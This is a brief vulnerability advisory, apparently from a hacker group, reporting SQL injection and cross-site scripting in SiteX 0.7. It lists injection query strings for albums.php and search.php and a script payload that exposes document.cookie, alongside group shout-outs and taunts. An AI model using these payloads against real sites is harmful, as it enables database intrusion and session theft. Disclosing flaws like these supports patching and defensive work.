SiteX version 0.7 is susceptible to SQL injection and cross site scripting attacks. Earlier versions may also be affected.
8e938a60980f971677e0b03851bb086b0351931f243f602da70867b7a9afcab0
I MurderSkillz from g00ns.net have found xss and possible SQL injection vulnerabilities in SiteX 0.7 (and possibly other versions).
Shouts to z3r0, neX, uid0 (exploitercode.com), Zodiac, Wicked, and all the other I may have forgot..
Once again..g00ns.net fucking owns j00!
SQL injection
albums.php
?albumid=20&page='
---------
search.php
?type=photo_keyword&search=2006&page='
---------
XSS
search.php
?type=photo_keyword&search=<script>alert(document.cookie);</script>